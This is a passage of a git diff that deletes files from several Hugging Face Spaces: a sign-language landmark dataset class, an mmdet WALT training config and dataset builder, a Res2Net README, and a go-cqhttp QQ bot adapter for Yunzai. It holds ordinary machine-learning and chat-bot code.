dict) -> torch.Tensor: - - output = np.empty(shape=(len(landmarks_dict["leftEar"]), len(BODY_IDENTIFIERS + HAND_IDENTIFIERS), 2)) - - for landmark_index, identifier in enumerate(BODY_IDENTIFIERS + HAND_IDENTIFIERS): - output[:, landmark_index, 0] = [frame[0] for frame in landmarks_dict[identifier]] - output[:, landmark_index, 1] = [frame[1] for frame in landmarks_dict[identifier]] - - return torch.from_numpy(output) - - -class CzechSLRDataset(torch_data.Dataset): - """Advanced object representation of the HPOES dataset for loading hand joints landmarks utilizing the Torch's - built-in Dataset properties""" - - data: [np.ndarray] - labels: [np.ndarray] - - def __init__(self, dataset_filename: str, num_labels=5, transform=None, augmentations=False, - augmentations_prob=0.5, normalize=True, augmentations_config: dict = DEFAULT_AUGMENTATIONS_CONFIG): - """ - Initiates the HPOESDataset with the pre-loaded data from the h5 file. - - :param dataset_filename: Path to the h5 file - :param transform: Any data transformation to be applied (default: None) - """ - - loaded_data = load_dataset(dataset_filename) - data, labels = loaded_data[0], loaded_data[1] - - self.data = data - self.labels = labels - self.targets = list(labels) - self.num_labels = num_labels - self.transform = transform - - self.augmentations = augmentations - self.augmentations_prob = augmentations_prob - self.augmentations_config = augmentations_config - self.normalize = normalize - - def __getitem__(self, idx): - """ - Allocates, potentially transforms and returns the item at the desired index. - - :param idx: Index of the item - :return: Tuple containing both the depth map and the label - """ - - depth_map = torch.from_numpy(np.copy(self.data[idx])) - label = torch.Tensor([self.labels[idx] - 1]) - - depth_map = tensor_to_dictionary(depth_map) - - # Apply potential augmentations - if self.augmentations and random.random() < self.augmentations_prob: - - selected_aug = randrange(4) - - if selected_aug == 0: - depth_map = augment_rotate(depth_map, (-self.augmentations_config["rotate-angle"], self.augmentations_config["rotate-angle"])) - - if selected_aug == 1: - depth_map = augment_shear(depth_map, "perspective", (0, self.augmentations_config["perspective-transform-ratio"])) - - if selected_aug == 2: - depth_map = augment_shear(depth_map, "squeeze", (0, self.augmentations_config["squeeze-ratio"])) - - if selected_aug == 3: - depth_map = augment_arm_joint_rotate(depth_map, self.augmentations_config["arm-joint-rotate-probability"], (-self.augmentations_config["arm-joint-rotate-angle"], self.augmentations_config["arm-joint-rotate-angle"])) - - if self.normalize: - depth_map = normalize_single_body_dict(depth_map) - depth_map = normalize_single_hand_dict(depth_map) - - depth_map = dictionary_to_tensor(depth_map) - - # Move the landmark position interval to improve performance - depth_map = depth_map - 0.5 - - if self.transform: - depth_map = self.transform(depth_map) - - return depth_map, label - - def __len__(self): - return len(self.labels) - - -if __name__ == "__main__": - pass diff --git a/spaces/CVPR/WALT/configs/walt/walt_people.py b/spaces/CVPR/WALT/configs/walt/walt_people.py deleted file mode 100644 index 2dc45cd270a2cdb64f33a3a47b32eadd15a98c57..0000000000000000000000000000000000000000 --- a/spaces/CVPR/WALT/configs/walt/walt_people.py +++ /dev/null @@ -1,80 +0,0 @@ -_base_ = [ - '../_base_/models/occ_mask_rcnn_swin_fpn.py', - '../_base_/datasets/walt_people.py', - '../_base_/schedules/schedule_1x.py', '../_base_/default_runtime.py' -] - -model = dict( - backbone=dict( - embed_dim=96, - depths=[2, 2, 6, 2], - num_heads=[3, 6, 12, 24], - window_size=7, - ape=False, - drop_path_rate=0.1, - patch_norm=True, - use_checkpoint=False - ), - neck=dict(in_channels=[96, 192, 384, 768])) - -img_norm_cfg = dict( - mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True) - -# augmentation strategy originates from DETR / Sparse RCNN -train_pipeline = [ - dict(type='LoadImageFromFile'), - dict(type='LoadAnnotations', with_bbox=True, with_mask=True), - dict(type='RandomFlip', flip_ratio=0.5), - dict(type='AutoAugment', - policies=[ - [ - dict(type='Resize', - img_scale=[(480, 1333), (512, 1333), (544, 1333), (576, 1333), - (608, 1333), (640, 1333), (672, 1333), (704, 1333), - (736, 1333), (768, 1333), (800, 1333)], - multiscale_mode='value', - keep_ratio=True) - ], - [ - dict(type='Resize', - img_scale=[(400, 1333), (500, 1333), (600, 1333)], - multiscale_mode='value', - keep_ratio=True), - dict(type='RandomCrop', - crop_type='absolute_range', - crop_size=(384, 600), - allow_negative_crop=True), - dict(type='Resize', - img_scale=[(480, 1333), (512, 1333), (544, 1333), - (576, 1333), (608, 1333), (640, 1333), - (672, 1333), (704, 1333), (736, 1333), - (768, 1333), (800, 1333)], - multiscale_mode='value', - override=True, - keep_ratio=True) - ] - ]), - dict(type='Normalize', **img_norm_cfg), - dict(type='Pad', size_divisor=32), - dict(type='DefaultFormatBundle'), - dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels', 'gt_masks']), -] -data = dict(train=dict(pipeline=train_pipeline)) - -optimizer = dict(_delete_=True, type='AdamW', lr=0.0001, betas=(0.9, 0.999), weight_decay=0.05, - paramwise_cfg=dict(custom_keys={'absolute_pos_embed': dict(decay_mult=0.), - 'relative_position_bias_table': dict(decay_mult=0.), - 'norm': dict(decay_mult=0.)})) -lr_config = dict(step=[8, 11]) -runner = dict(type='EpochBasedRunnerAmp', max_epochs=12) - -# do not use mmdet version fp16 -fp16 = None -optimizer_config = dict( - type="DistOptimizerHook", - update_interval=1, - grad_clip=None, - coalesce=True, - bucket_size_mb=-1, - use_fp16=True, -) diff --git a/spaces/CVPR/WALT/mmdet/datasets/builder.py b/spaces/CVPR/WALT/mmdet/datasets/builder.py deleted file mode 100644 index c9466a517dee746a6677b27a19713f2e89ed7194..0000000000000000000000000000000000000000 --- a/spaces/CVPR/WALT/mmdet/datasets/builder.py +++ /dev/null @@ -1,143 +0,0 @@ -import copy -import platform -import random -from functools import partial - -import numpy as np -from mmcv.parallel import collate -from mmcv.runner import get_dist_info -from mmcv.utils import Registry, build_from_cfg -from torch.utils.data import DataLoader - -from .samplers import DistributedGroupSampler, DistributedSampler, GroupSampler - -if platform.system() != 'Windows': - # https://github.com/pytorch/pytorch/issues/973 - import resource - rlimit = resource.getrlimit(resource.RLIMIT_NOFILE) - hard_limit = rlimit[1] - soft_limit = min(4096, hard_limit) - resource.setrlimit(resource.RLIMIT_NOFILE, (soft_limit, hard_limit)) - -DATASETS = Registry('dataset') -PIPELINES = Registry('pipeline') - - -def _concat_dataset(cfg, default_args=None): - from .dataset_wrappers import ConcatDataset - ann_files = cfg['ann_file'] - img_prefixes = cfg.get('img_prefix', None) - seg_prefixes = cfg.get('seg_prefix', None) - proposal_files = cfg.get('proposal_file', None) - separate_eval = cfg.get('separate_eval', True) - - datasets = [] - num_dset = len(ann_files) - for i in range(num_dset): - data_cfg = copy.deepcopy(cfg) - # pop 'separate_eval' since it is not a valid key for common datasets. - if 'separate_eval' in data_cfg: - data_cfg.pop('separate_eval') - data_cfg['ann_file'] = ann_files[i] - if isinstance(img_prefixes, (list, tuple)): - data_cfg['img_prefix'] = img_prefixes[i] - if isinstance(seg_prefixes, (list, tuple)): - data_cfg['seg_prefix'] = seg_prefixes[i] - if isinstance(proposal_files, (list, tuple)): - data_cfg['proposal_file'] = proposal_files[i] - datasets.append(build_dataset(data_cfg, default_args)) - - return ConcatDataset(datasets, separate_eval) - - -def build_dataset(cfg, default_args=None): - from .dataset_wrappers import (ConcatDataset, RepeatDataset, - ClassBalancedDataset) - if isinstance(cfg, (list, tuple)): - dataset = ConcatDataset([build_dataset(c, default_args) for c in cfg]) - elif cfg['type'] == 'ConcatDataset': - dataset = ConcatDataset( - [build_dataset(c, default_args) for c in cfg['datasets']], - cfg.get('separate_eval', True)) - elif cfg['type'] == 'RepeatDataset': - dataset = RepeatDataset( - build_dataset(cfg['dataset'], default_args), cfg['times']) - elif cfg['type'] == 'ClassBalancedDataset': - dataset = ClassBalancedDataset( - build_dataset(cfg['dataset'], default_args), cfg['oversample_thr']) - elif isinstance(cfg.get('ann_file'), (list, tuple)): - dataset = _concat_dataset(cfg, default_args) - else: - dataset = build_from_cfg(cfg, DATASETS, default_args) - - return dataset - - -def build_dataloader(dataset, - samples_per_gpu, - workers_per_gpu, - num_gpus=1, - dist=True, - shuffle=True, - seed=None, - **kwargs): - """Build PyTorch DataLoader. - - In distributed training, each GPU/process has a dataloader. - In non-distributed training, there is only one dataloader for all GPUs. - - Args: - dataset (Dataset): A PyTorch dataset. - samples_per_gpu (int): Number of training samples on each GPU, i.e., - batch size of each GPU. - workers_per_gpu (int): How many subprocesses to use for data loading - for each GPU. - num_gpus (int): Number of GPUs. Only used in non-distributed training. - dist (bool): Distributed training/test or not. Default: True. - shuffle (bool): Whether to shuffle the data at every epoch. - Default: True. - kwargs: any keyword argument to be used to initialize DataLoader - - Returns: - DataLoader: A PyTorch dataloader. - """ - rank, world_size = get_dist_info() - if dist: - # DistributedGroupSampler will definitely shuffle the data to satisfy - # that images on each GPU are in the same group - if shuffle: - sampler = DistributedGroupSampler( - dataset, samples_per_gpu, world_size, rank, seed=seed) - else: - sampler = DistributedSampler( - dataset, world_size, rank, shuffle=False, seed=seed) - batch_size = samples_per_gpu - num_workers = workers_per_gpu - else: - sampler = GroupSampler(dataset, samples_per_gpu) if shuffle else None - batch_size = num_gpus * samples_per_gpu - num_workers = num_gpus * workers_per_gpu - - init_fn = partial( - worker_init_fn, num_workers=num_workers, rank=rank, - seed=seed) if seed is not None else None - - data_loader = DataLoader( - dataset, - batch_size=batch_size, - sampler=sampler, - num_workers=num_workers, - collate_fn=partial(collate, samples_per_gpu=samples_per_gpu), - pin_memory=False, - worker_init_fn=init_fn, - **kwargs) - - return data_loader - - -def worker_init_fn(worker_id, num_workers, rank, seed): - # The seed of each worker equals to - # num_worker * rank + worker_id + user_seed - worker_seed = num_workers * rank + worker_id + seed - np.random.seed(worker_seed) - random.seed(worker_seed) diff --git a/spaces/Chujinze/Res2Net/README.md b/spaces/Chujinze/Res2Net/README.md deleted file mode 100644 index 08136cd740a9589de8235927d5293a3e09c5bbeb..0000000000000000000000000000000000000000 --- a/spaces/Chujinze/Res2Net/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Res2Net -emoji: 👁 -colorFrom: green -colorTo: gray -sdk: gradio -sdk_version: 3.0.1 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces#reference diff --git a/spaces/CikeyQI/Yunzai/Yunzai/plugins/adapter/go-cqhttp.js b/spaces/CikeyQI/Yunzai/Yunzai/plugins/adapter/go-cqhttp.js deleted file mode 100644 index 78cc78330088d80b49d4afa30c940f4086029480..0000000000000000000000000000000000000000 --- a/spaces/CikeyQI/Yunzai/Yunzai/plugins/adapter/go-cqhttp.js +++ /dev/null @@ -1,842 +0,0 @@ -import { randomUUID } from "crypto" -import path from "node:path" -import fs from "node:fs" - -Bot.adapter.push(new class gocqhttpAdapter { - constructor() { - this.id = "QQ" - this.name = "go-cqhttp" - this.path = this.name - } - - toStr(data) { - switch (typeof data) { - case "string": - return data - case "number": - return String(data) - case "object": - if (Buffer.isBuffer(data)) - return Buffer.from(data, "utf8").toString() - else - return JSON.stringify(data) - } - return data - } - - makeLog(msg) { - return this.toStr(msg).replace(/base64:\/\/.*?(,|]|")/g, "base64://...$1") - } - - sendApi(ws, action, params) { - const echo = randomUUID() - const msg = { action, params, echo } - ws.sendMsg(msg) - return new Promise(resolve => - Bot.once(echo, data => - resolve({ ...data, ...data.data }))) - } - - setProfile(data, profile) { - logger.info(`${logger.blue(`[${data.self_id}]`)} 设置资料:${JSON.stringify(profile)}`) - return data.bot.sendApi("set_qq_profile", profile) - } - - makeMsg(msg) { - if (!Array.isArray(msg)) - msg = [msg] - const msgs = [] - for (const i of msg) - if (typeof i == "object") { - if (i.data) - msgs.push(i) - else - msgs.push({ type: i.type, data: { ...i, type: undefined }}) - } else { - msgs.push({ type: "text", data: { text: i }}) - } - return msgs - } - - sendFriendMsg(data, msg) { - if (msg?.type == "node") - return this.sendFriendForwardMsg(data, msg.data) - - logger.info(`${logger.blue(`[${data.self_id} => ${data.user_id}]`)} 发送好友消息:${this.makeLog(msg)}`) - return data.bot.sendApi("send_msg", { - user_id: data.user_id, - message: this.makeMsg(msg), - }) - } - - sendGroupMsg(data, msg) { - if (msg?.type == "node") - return this.sendGroupForwardMsg(data, msg.data) - - logger.info(`${logger.blue(`[${data.self_id} => ${data.group_id}]`)} 发送群消息:${this.makeLog(msg)}`) - return data.bot.sendApi("send_msg", { - group_id: data.group_id, - message: this.makeMsg(msg), - }) - } - - sendGuildMsg(data, msg) { - if (msg?.type == "node") - return Bot.sendForwardMsg(msg => this.sendGuildMsg(data, msg), msg) - - logger.info(`${logger.blue(`[${data.self_id}] => ${data.guild_id}-${data.channel_id}`)} 发送频道消息:${this.makeLog(msg)}`) - return data.bot.sendApi("send_guild_channel_msg", { - guild_id: data.guild_id, - channel_id: data.channel_id, - message: this.makeMsg(msg), - }) - } - - async getMsg(data, message_id) { - const msg = (await data.bot.sendApi("get_msg", { message_id })).data - - if (msg?.message) { - const message = [] - for (const i of msg.message) - message.push({ ...i.data, type: i.type }) - msg.message = message - } - - return msg - } - - recallMsg(data, message_id) { - logger.info(`${logger.blue(`[${data.self_id}]`)} 撤回消息:${message_id}`) - return data.bot.sendApi("delete_msg", { message_id }) - } - - getForwardMsg(data, message_id) { - return data.bot.sendApi("get_forward_msg", { message_id }) - } - - makeForwardMsg(msg) { - const messages = [] - for (const i of msg) - messages.push({ - type: "node", - data: { - name: i.nickname || "匿名消息", - uin: Number(i.user_id) || 80000000, - content: this.makeMsg(i.message), - time: i.time, - }, - }) - return messages - } - - async sendFriendForwardMsg(data, msg) { - logger.info(`${logger.blue(`[${data.self_id} => ${data.user_id}]`)} 发送好友转发消息:${this.makeLog(msg)}`) - msg = await data.bot.sendApi("send_private_forward_msg", { - user_id: data.user_id, - messages: this.makeForwardMsg(msg), - }) - return msg - } - - async sendGroupForwardMsg(data, msg) { - logger.info(`${logger.blue(`[${data.self_id} => ${data.group_id}]`)} 发送群转发消息:${this.makeLog(msg)}`) - msg = await data.bot.sendApi("send_group_forward_msg", { - group_id: data.group_id, - messages: this.makeForwardMsg(msg), - }) - return msg - } - - async getFriendArray(data) { - return (await data.bot.sendApi("get_friend_list")).data - } - - async getFriendList(data) { - const array = [] - for (const { user_id } of (await this.getFriendArray(data))) - array.push(user_id) - return array - } - - async getFriendMap(data) { - for (const i of (await this.getFriendArray(data))) - data.bot.fl.set(i.user_id, i) - return data.bot.fl - } - - getFriendInfo(data) { - return data.bot.sendApi("get_stranger_info", { - user_id: data.user_id, - }) - } - - async getGroupArray(data) { - const array = (await data.bot.sendApi("get_group_list")).data - for (const guild of (await this.getGuildArray(data))) - for (const channel of (await this.getGuildChannelArray({ - ...data, - guild_id: guild.guild_id, - }))) - array.push({ - guild, - channel, - group_id: `${guild.guild_id}-${channel.channel_id}`, - group_name: `${guild.guild_name}-${channel.channel_name}`, - }) - return array - } - - async getGroupList(data) { - const array = [] - for (const { group_id } of (await this.getGroupArray(data))) - array.push(group_id) - return array - } - - async getGroupMap(data) { - for (const i of (await this.getGroupArray(data))) - data.bot.gl.set(i.group_id, i) - return data.bot.gl - } - - getGroupInfo(data) { - return data.bot.sendApi("get_group_info", { - group_id: data.group_id, - }) - } - - async getMemberArray(data) { - return (await data.bot.sendApi("get_group_member_list", { - group_id: data.group_id, - })).data - } - - async getMemberList(data) { - const array = [] - for (const { user_id } of (await this.getMemberArray(data))) - array.push(user_id) - return array - } - - async getMemberMap(data) { - const map = new Map - for (const i of (await this.getMemberArray(data))) - map.set(i.user_id, i) - return map - } - - getMemberInfo(data) { - return data.bot.sendApi("get_group_member_info", { - group_id: data.group_id, - user_id: data.user_id, - }) - } - - async getGuildArray(data) { - return (await data.bot.sendApi("get_guild_list")).data - } - - getGuildInfo(data) { - return data.bot.sendApi("get_guild_meta_by_guest", { - guild_id: data.guild_id, - }) - } - - async getGuildChannelArray(data) { - return (await data.bot.sendApi("get_guild_channel_list", { - guild_id: data.guild_id, - })).data - } - - async getGuildChannelMap(data) { - const map = new Map - for (const i of (await this.getGuildChannelArray(data))) - map.set(i.channel_id, i) - return map - } - - async getGuildMemberArray(data) { - const array = [] - let next_token = "" - while (true) { - const list = (await data.bot.sendApi("get_guild_member_list", { - guild_id: data.guild_id, - next_token, - })).data - - for (const i of list.members) - array.push({ - ...i, - user_id: i.tiny_id, - }) - if (list.finished) break - next_token = list.next_token - } - return array - } - - async getGuildMemberList(data) { - const array = [] - for (const { user_id } of (await this.getGuildMemberArray(data))) - array.push(user_id) - return array.push - } - - async getGuildMemberMap(data) { - const map = new Map - for (const i of (await this.getGuildMemberArray(data))) - map.set(i.user_id, i) - return map - } - - getGuildMemberInfo(data) { - return data.bot.sendApi("get_guild_member_profile", { - guild_id: data.guild_id, - user_id: data.user_id, - }) - } - - setGroupName(data, group_name) { - logger.info(`${logger.blue(`[${data.self_id}]`)} 设置群名:[${data.group_id}] ${group_name}`) - return data.bot.sendApi("set_group_name", { - group_id: data.group_id, - group_name, - }) - } - - setGroupAvatar(data, file) { - logger.info(`${logger.blue(`[${data.self_id}]`)} 设置群头像:[${data.group_id}] ${file}`) - return data.bot.sendApi("set_group_portrait", { - group_id: data.group_id, - file: segment.image(file).file, - }) - } - - setGroupAdmin(data, user_id, enable) { - logger.info(`${logger.blue(`[${data.self_id}]`)} ${enable ? "设置" : "取消"}群管理员:[${data.group_id}] ${user_id}`) - return data.bot.sendApi("set_group_admin", { - group_id: data.group_id, - user_id, - enable, - }) - } - - setGroupCard(data, user_id, card) { - logger.info(`${logger.blue(`[${data.self_id}]`)} 设置群名片:[${data.group_id}] ${user_id} ${card}`) - return data.bot.sendApi("set_group_card", { - group_id: data.group_id, - user_id, - card, - }) - } - - setGroupTitle(data, user_id, special_title, duration) { - logger.info(`${logger.blue(`[${data.self_id}]`)} 设置群头衔:[${data.group_id}] ${user_id} ${special_title} ${duration}`) - return data.bot.sendApi("set_group_special_title", { - group_id: data.group_id, - user_id, - special_title, - duration, - }) - } - - downloadFile(data, url, thread_count, headers) { - return data.bot.sendApi("download_file", { - url, - thread_count, - headers, - }) - } - - async makeFile(data, file, name = path.basename(file)) { - if (file.match(/^https?:\/\//)) - file = (await this.downloadFile(data, file)).file - else if (fs.existsSync(file)) - file = path.resolve(file) - return { file, name } - } - - async sendFriendFile(data, file, name) { - logger.info(`${logger.blue(`[${data.self_id} => ${data.user_id}]`)} 发送好友文件:${name}(${file})`) - return data.bot.sendApi("upload_private_file", { - user_id: data.user_id, - ...await this.makeFile(data, file, name), - }) - } - - async sendGroupFile(data, file, folder, name) { - logger.info(`${logger.blue(`[${data.self_id}]`)} 发送群文件:[${data.group_id}] ${folder||""}/${name}(${file})`) - return data.bot.sendApi("upload_group_file", { - group_id: data.group_id, - folder, - ...await this.makeFile(data, file, name), - }) - } - - deleteGroupFile(data, file_id, busid) { - logger.info(`${logger.blue(`[${data.self_id}]`)} 删除群文件:[${data.group_id}] ${file_id}(${busid})`) - return data.bot.sendApi("delete_group_file", { - group_id: data.group_id, - file_id, - busid, - }) - } - - createGroupFileFolder(data, name) { - logger.info(`${logger.blue(`[${data.self_id}]`)} 创建群文件夹:[${data.group_id}] ${name}`) - return data.bot.sendApi("create_group_file_folder", { - group_id: data.group_id, - name, - }) - } - - getGroupFileSystemInfo(data) { - return data.bot.sendApi("get_group_file_system_info", { - group_id: data.group_id, - }) - } - - getGroupFiles(data, folder_id) { - if (folder_id) - return data.bot.sendApi("get_group_files_by_folder", { - group_id: data.group_id, - folder_id, - }) - return data.bot.sendApi("get_group_root_files", { - group_id: data.group_id, - }) - } - - getGroupFileUrl(data, file_id, busid) { - return data.bot.sendApi("get_group_file_url", { - group_id: data.group_id, - file_id, - busid, - }) - } - - getGroupFs(data) { - return { - upload: (file, folder, name) => this.sendGroupFile(data, file, folder, name), - rm: (file_id, busid) => this.deleteGroupFile(data, file_id, busid), - mkdir: name => this.createGroupFileFolder(data, name), - df: () => this.getGroupFileSystemInfo(data), - ls: folder_id => this.getGroupFiles(data, folder_id), - download: (file_id, busid) => this.getGroupFileUrl(data, file_id, busid), - } - } - - setFriendAddRequest(data, flag, approve, remark) { - return data.bot.sendApi("set_friend_add_request", { - flag, - approve, - remark, - }) - } - - setGroupAddRequest(data, flag, sub_type, approve, reason) { - return data.bot.sendApi("set_group_add_request", { - flag, - sub_type, - approve, - reason, - }) - } - - pickFriend(data, user_id) { - const i = { - ...data.bot.fl.get(user_id), - ...data, - user_id, - } - return { - ...i, - sendMsg: msg => this.sendFriendMsg(i, msg), - getMsg: message_id => this.getMsg(i, message_id), - recallMsg: message_id => this.recallMsg(i, message_id), - getForwardMsg: message_id => this.getForwardMsg(i, message_id), - sendForwardMsg: msg => this.sendFriendForwardMsg(i, msg), - sendFile: (file, name) => this.sendFriendFile(i, file, name), - getInfo: () => this.getFriendInfo(i), - getAvatarUrl: () => `https://q1.qlogo.cn/g?b=qq&s=0&nk=${user_id}`, - } - } - - pickMember(data, group_id, user_id) { - if (typeof group_id == "string" && group_id.match("-")) { - const guild_id = group_id.split("-") - const i = { - ...data, - guild_id: guild_id[0], - channel_id: guild_id[1], - user_id, - } - return { - ...this.pickGroup(i, group_id), - ...i, - getInfo: () => this.getGuildMemberInfo(i), - getAvatarUrl: async () => (await this.getGuildMemberInfo(i)).avatar_url, - } - } - - const i = { - ...data.bot.fl.get(user_id), - ...data, - group_id, - user_id, - } - return { - ...this.pickFriend(i, user_id), - ...i, - getInfo: () => this.getMemberInfo(i), - poke: () => this.sendGroupMsg(i, segment.poke(user_id)), - } - } - - pickGroup(data, group_id) { - if (typeof group_id == "string" && group_id.match("-")) { - const guild_id = group_id.split("-") - const i = { - ...data.bot.gl.get(group_id), - ...data, - guild_id: guild_id[0], - channel_id: guild_id[1], - } - return { - ...i, - sendMsg: msg => this.sendGuildMsg(i, msg), - getMsg: message_id => this.getMsg(i, message_id), - recallMsg: message_id => this.recallMsg(i, message_id), - getForwardMsg: message_id => this.getForwardMsg(i, message_id), - getInfo: () => this.getGuildInfo(i), - getChannelArray: () => this.getGuildChannelArray(i), - getChannelList: () => this.getGuildChannelList(i), - getChannelMap: () => this.getGuildChannelMap(i), - getMemberArray: () => this.getGuildMemberArray(i), - getMemberList: () => this.getGuildMemberList(i), - getMemberMap: () => this.getGuildMemberMap(i), - pickMember: user_id => this.pickMember(i, group_id, user_id), - } - } - - const i = { - ...data.bot.gl.get(group_id), - ...data, - group_id, - } - return { - ...i, - sendMsg: msg => this.sendGroupMsg(i, msg), - getMsg: message_id => this.getMsg(i, message_id), - recallMsg: message_id => this.recallMsg(i, message_id), - getForwardMsg: message_id => this.getForwardMsg(i, message_id), - sendForwardMsg: msg => this.sendGroupForwardMsg(i, msg), - sendFile: (file, name) => this.sendGroupFile(i, file, undefined, name), - getInfo: () => this.getGroupInfo(i), - getAvatarUrl: () => `https://p.qlogo.cn/gh/${group_id}/${group_id}/0`, - getMemberArray: () => this.getMemberArray(i), - getMemberList: () => this.getMemberList(i), - getMemberMap: () => this.getMemberMap(i), - pickMember: user_id => this.pickMember(i, group_id, user_id), - pokeMember: user_id => this.sendGroupMsg(i, segment.poke(user_id)), - setName: group_name => this.setGroupName(i, group_name), - setAvatar: file => this.setGroupAvatar(i, file), - setAdmin: (user_id, enable) => this.setGroupAdmin(i, user_id, enable), - setCard: (user_id, card) => this.setGroupCard(i, user_id, card), - setTitle: (user_id, special_title, duration) => this.setGroupTitle(i, user_id, special_title, duration), - fs: this.getGroupFs(i), - } - } - - async connect(data, ws) { - Bot[data.self_id] = { - adapter: this, - ws: ws, - sendApi: (action, params) => this.sendApi(ws, action, params), - stat: { start_time: data.time }, - model: "TRSS Yunzai ", - - info: {}, - get uin() { return this.info.user_id }, - get nickname() { return this.info.nickname }, - get avatar() { return `https://q1.qlogo.cn/g?b=qq&s=0&nk=${this.uin}` }, - - setProfile: profile => this.setProfile(data, profile), - setNickname: nickname => this.setProfile(data, { nickname }), - - pickFriend: user_id => this.pickFriend(data, user_id), - get pickUser() { return this.pickFriend }, - getFriendArray: () => this.getFriendArray(data), - getFriendList: () => this.getFriendList(data), - getFriendMap: () => this.getFriendMap(data), - fl: new Map, - - pickMember: (group_id, user_id) => this.pickMember(data, group_id, user_id), - pickGroup: group_id => this.pickGroup(data, group_id), - getGroupArray: () => this.getGroupArray(data), - getGroupList: () => this.getGroupList(data), - getGroupMap: () => this.getGroupMap(data), - gl: new Map, - gml: new Map, - - request_list: [], - getSystemMsg: () => data.bot.request_list, - setFriendAddRequest: (flag, approve, remark) => this.setFriendAddRequest(data, flag, approve, remark), - setGroupAddRequest: (flag, sub_type, approve, reason) => this.setGroupAddRequest(data, flag, sub_type, approve, reason), - } - data.bot = Bot[data.self_id] - - if (!Bot.uin.includes(data.self_id)) - Bot.uin.push(data.self_id) - - data.bot.sendApi("_set_model_show", { - model: data.bot.model, - model_show: data.bot.model, - }) - - data.bot.info = (await data.bot.sendApi("get_login_info")).data - data.bot.guild_info = (await data.bot.sendApi("get_guild_service_profile")).data - data.bot.clients = (await data.bot.sendApi("get_online_clients")).clients - data.bot.version = { - ...(await data.bot.sendApi("get_version_info")).data, - id: this.id, - name: this.name, - } - - data.bot.getFriendMap() - data.bot.getGroupMap() - - logger.mark(`${logger.blue(`[${data.self_id}]`)} ${this.name}(${this.id}) ${data.bot.version.app_full_name} 已连接`) - Bot.em(`connect.${data.self_id}`, data) - } - - makeMessage(data) { - const message = [] - for (const i of data.message) - message.push({ ...i.data, type: i.type }) - data.message = message - - switch (data.message_type) { - case "private": - logger.info(`${logger.blue(`[${data.self_id}]`)} 好友消息:[${data.sender.nickname}(${data.user_id})] ${data.raw_message}`) - break - case "group": - logger.info(`${logger.blue(`[${data.self_id}]`)} 群消息:[${data.group_id}, ${data.sender.card||data.sender.nickname}(${data.user_id})] ${data.raw_message}`) - break - case "guild": - data.message_type = "group" - data.group_id = `${data.guild_id}-${data.channel_id}` - logger.info(`${logger.blue(`[${data.self_id}]`)} 频道消息:[${data.group_id}, ${data.sender.nickname}(${data.user_id})] ${JSON.stringify(data.message)}`) - Object.defineProperty(data, "friend", { get() { return this.member || {}}}) - break - default: - logger.warn(`${logger.blue(`[${data.self_id}]`)} 未知消息:${logger.magenta(JSON.stringify(data))}`) - } - - Bot.em(`${data.post_type}.${data.message_type}.${data.sub_type}`, data) - } - - async makeNotice(data) { - switch (data.notice_type) { - case "friend_recall": - logger.info(`${logger.blue(`[${data.self_id}]`)} 好友消息撤回:[${data.user_id}] ${data.message_id}`) - break - case "group_recall": - logger.info(`${logger.blue(`[${data.self_id}]`)} 群消息撤回:[${data.group_id}, ${data.operator_id}=>${data.user_id}] ${data.message_id}`) - break - case "group_increase": - logger.info(`${logger.blue(`[${data.self_id}]`)} 群成员增加:[${data.group_id}, ${data.operator_id}=>${data.user_id}] ${data.sub_type}`) - if (data.user_id == data.self_id) - data.bot.getGroupMap() - break - case "group_decrease": - logger.info(`${logger.blue(`[${data.self_id}]`)} 群成员减少:[${data.group_id}, ${data.operator_id}=>${data.user_id}] ${data.sub_type}`) - if (data.user_id == data.self_id) - data.bot.getGroupMap() - break - case "group_admin": - logger.info(`${logger.blue(`[${data.self_id}]`)} 群管理员变动:[${data.group_id}, ${data.user_id}] ${data.sub_type}`) - data.set = data.sub_type == "set" - break - case "group_upload": - logger.info(`${logger.blue(`[${data.self_id}]`)} 群文件上传:[${data.group_id}, ${data.user_id}] ${JSON.stringify(data.file)}`) - break - case "group_ban": - logger.info(`${logger.blue(`[${data.self_id}]`)} 群禁言:[${data.group_id}, ${data.operator_id}=>${data.user_id}] ${data.sub_type} ${data.duration}秒`) - break - case "friend_add": - logger.info(`${logger.blue(`[${data.self_id}]`)} 好友添加:[${data.user_id}]`) - data.bot.getFriendMap() - break - case "notify": - if (data.group_id) - data.notice_type = "group" - else - data.notice_type = "friend" - switch (data.sub_type) { - case "poke": - data.operator_id = data.user_id - if (data.group_id) - logger.info(`${logger.blue(`[${data.self_id}]`)} 群戳一戳:[${data.group_id}, ${data.operator_id}=>${data.target_id}]`) - else - logger.info(`${logger.blue(`[${data.self_id}]`)} 好友戳一戳:[${data.operator_id}=>${data.target_id}]`) - break - case "honor": - logger.info(`${logger.blue(`[${data.self_id}]`)} 群荣誉:[${data.group_id}, ${data.user_id}] ${data.honor_type}`) - break - case "title": - logger.info(`${logger.blue(`[${data.self_id}]`)} 群头衔:[${data.group_id}, ${data.user_id}] ${data.title}`) - break - default: - logger.warn(`${logger.blue(`[${data.self_id}]`)} 未知通知:${logger.magenta(JSON.stringify(data))}`) - } - break - case "group_card": - logger.info(`${logger.blue(`[${data.self_id}]`)} 群名片更新:[${data.group_id}, ${data.user_id}] ${data.card_old}=>${data.card_new}`) - break - case "offline_file": - logger.info(`${logger.blue(`[${data.self_id}]`)} 离线文件:[${data.user_id}] ${JSON.stringify(data.file)}`) - break - case "client_status": - logger.info(`${logger.blue(`[${data.self_id}]`)} 客户端${data.online ? "上线" : "下线"}:${JSON.stringify(data.client)}`) - data.clients = (await data.bot.sendApi("get_online_clients")).clients - data.bot.clients = data.clients - break - case "essence": - data.notice_type = "group_essence" - logger.info(`${logger.blue(`[${data.self_id}]`)} 群精华消息:[${data.group_id}, ${data.operator_id}=>${data.sender_id}] ${data.sub_type} ${data.message_id}`) - break - case "guild_channel_recall": - logger.info(`${logger.blue(`[${data.self_id}]`)} 频道消息撤回:[${data.guild_id}-${data.channel_id}, ${data.operator_id}=>${data.user_id}] ${data.message_id}`) - break - case "message_reactions_updated": - data.notice_type = "guild_message_reactions_updated" - logger.info(`${logger.blue(`[${data.self_id}]`)} 频道消息表情贴:[${data.guild_id}-${data.channel_id}, ${data.user_id}] ${data.message_id} ${JSON.stringify(data.current_reactions)}`) - break - case "channel_updated": - data.notice_type = "guild_channel_updated" - 